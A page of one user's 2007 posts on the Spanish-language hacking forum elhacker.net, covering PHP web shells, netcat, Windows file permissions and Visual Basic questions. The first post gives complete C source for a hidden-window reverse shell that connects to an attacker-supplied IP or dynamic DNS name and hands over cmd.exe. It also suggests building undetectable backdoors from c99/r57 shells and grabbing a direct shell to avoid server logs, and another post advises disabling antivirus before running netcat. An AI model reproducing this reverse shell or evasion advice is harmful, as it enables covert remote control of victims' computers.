elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 ... 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 [425] 426 427 428 429 430 431 432 433 434 435 436
4241  Seguridad Informática / Nivel Web / Re: Server Explorer PHP Shell - Updated en: 12 Junio 2007, 06:47 am
 :P tiene la función de la shell y para instalar netcat con Wget... podriamos desarmar el c99 o el r57 para crear nuestros propios backdoors indetectables para unix y windows con detectores y todo lo demas.
Nota: Si tenía instalado netcat y wget pero no me lo reconoció como instalado. estaban en %windir%\system32\nc.exe y wget.exe creo que son direcciones tipicas que podrías incluir en la busqueda, ademas no necesitas usarel netcat para tener la shell inversa... basta compilar esto:

Código:
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib,"ws2_32"Giño

int main(int argc, char *argv[])
{
ShowWindow(GetForegroundWindow(),SW_HIDE);
WSADATA wsaData;
SOCKET hSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in addr;
memset(&addr,0,sizeof(addr));
memset(&si,0,sizeof(si));
WSAStartup(MAKEWORD(2,0),&wsaData);
hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
addr.sin_family = AF_INET;
addr.sin_port = htons(PUERTO);
addr.sin_addr.s_addr = inet_addr("TU IP O DOMINIO NO-IP")Giño;
connect(hSocket,(struct sockaddr*)&addr,sizeof(addr));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
ExitProcess(0);
}
Cuando tenga tiempo trataré de ayudarte para que todos podamos colaborar o si lo prefieres me hago uno solo.
Recuerda además que si manejas una simulación de netcat directamente estarás enviando tus comandos directamente al log del servidor, por eso prefiero tomar una shell directa lo mas luego posible despues de tomarla desde el servidor web, se que algunos usan sniffers pero es menos que el 100% de probabilidades que teines sobre dejar tus huellas en el servidor  :P
4242  Seguridad Informática / Nivel Web / Re: BlindMap - Advanced SQL Injection en: 12 Junio 2007, 06:34 am
Porfin un usuarui de rapidshare y no de megaupload  :xD

Muy bueno tus tutos codebreack... mucho antes que entraras en este foro yo miraba todos tus videos y desde entonces que he aprendido bastante... ojalá tenga algún dia el tiempo que tu tienes para poder aprender mas  :xD

Felicitaciones.
4243  Programación / Programación Visual Basic / Re: proteccion de los exe en: 12 Junio 2007, 03:12 am
buscate el armadillo.. es parecido al themida.
No es perfecto pero les causaras grandes dolores de cabeza al que quiera descompilar tu soft.
4244  Informática / Tutoriales - Documentación / Re: Curso Shell en: 11 Junio 2007, 20:04 pm
Muy bueno... me ha gustado bastante.
Se supone que cuando contratas un servidor externo te dan esa shell para poder administrar tu servidor "X"?
4245  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 9 Junio 2007, 23:53 pm
Puedes aplicar politicas de administración de archivos con el comando cacls e impedir su ejecución y eliminación de cada ejecutable involucrado en un proceso  :P

Ejemplo:

Restringe:
cacls C:\1.exe /E /C /P %username%:n
cacls C:\1.exe /E /C /P SYSTEM:n

Habilita:
cacls C:\1.exe /E /C /P SYSTEM:f
cacls C:\1.exe /E /C /P %username%:f

Citar
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>cacls
Muestra o modifica las listas de control de acceso (ACL)  de archivos

CACLS archivo [/T] [/E] [/C] [/G usuario:perm] [/R usuario [...]]
               [/P usuario:perm [...]] [/D usuario [...]]);
   archivo          Muestra ACLs.
   /T               Cambia las ACLs de los archivos especificados en
                 el directorio actual y en todos los subdirectorios.
   /E                Modifica la ACL en vez de remplazarla.
   /C               Continúa cambiando ACLs, omitiendo errores.
   /G usuario:perm  Concede derechos de acceso al usuario.
                 Perm puede ser: R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /R usuario    Suspende los derechos del usuario (sólo con /E).
   /P usuario:perm  Sustituye los derechos de acceso del usuario.
                 Perm puede ser: N  Ninguno
                              R  Leer
                              W  Escribir
                              C  Cambiar (escribir)
                              F  Control total
   /D usuario       Denegar acceso al usuario especificado.
Se pueden usar comodines para especificar más de un archivo en el comando.
Puede especificar más de un usuario en el comando.

Abreviaciones:
   CI - Herencia de Contenedor.
        ACE se heredará por directorios.
   OI - Herencia de objeto.
        ACE se heredará por archivos.
   IO - Sólo heredar.
        ACE no se aplica al archivo o directorio actual.

C:\WINDOWS>
4246  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 5 Junio 2007, 05:59 am
Citar
mi IP cambia cada vez que me conecto
Puedes crear una cuenta No-Ip la cual te asigna un nombre llamado DNS por ejemplo el mio: bogamory.sytes.net el cual al encender la pc automaticamente mi IP pasa a ser ese nombre. http://www.no-ip.com/services/managed_dns/free_dynamic_dns.html

Citar
logré mandar mis Mails a mi cuenta en yahoo, pero hotmail me los rebota por política de la empresa
Hotmail ya no acepta correos de cualquier IP  :P como antes lo hacia.
4247  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 4 Junio 2007, 04:18 am
Usa este directamente:
http://www.vulnwatch.org/netcat/nc111nt.zip y desactiva tu antivirus antes de usarlo.
Si aun no puedes usarlo entonces tu pc tiene problemas y eso Debes plantearlo en otro subforo  :-\
4248  Programación / Programación Visual Basic / Re: Crear caracteres especiales en: 4 Junio 2007, 03:44 am
El cliente ya instala por defecto ese tipo de caracteres, pero como las envio? ya que directamente no jala ni aun teniendo las fuentes instaladas.
4249  Programación / Programación Visual Basic / Crear caracteres especiales en: 4 Junio 2007, 03:23 am
Como puedo hacer que mi programa acepte caracteres especiales como letras chinas?
Por ejemplo quiero poner en una caja de texto o dentro del mismo codigo fuente las letras (܃怎樣樣) (los que no tienen instalado caracteres chinos no podran verlas  ;D) para despues enviarlas por winsock a otro cliente que está en modo winsock.listen. La ides es:

winsock1.senddata Text2.Text & vbCrLf

O simplemente:

winsock1.senddata "怎樣樣怎█████████" &vbCrLfç

Pero en ves de eso envia esto: ?????¦¦¦¦¦¦¦

4250  Seguridad Informática / Hacking Básico / Re: Jugando con netcat en: 3 Junio 2007, 02:50 am
Escribe tu mjeberreta.txt, además no puedes enviar correos anonimamente o sin usar una contraseña en servidores como timonfonika, hotmail, yahoo, etc etc... por eso utilizé el miniremailer como servidor SMTP... ahora puedes usar un miniremailer para consola si quieres enviarlos directamente desde una makina remota  :P
Usa el miniremailer directamente desde http://512.iespana.es/nc
Nota: en un tiempo mas cambiaré los links directamente para que no sigan diciendo que mi post es SPAM para promocionar mi web ya que ni si quiera está terminada como para querer generar visitas :P.
Páginas: 1 ... 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 [425] 426 427 428 429 430 431 432 433 434 435 436
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines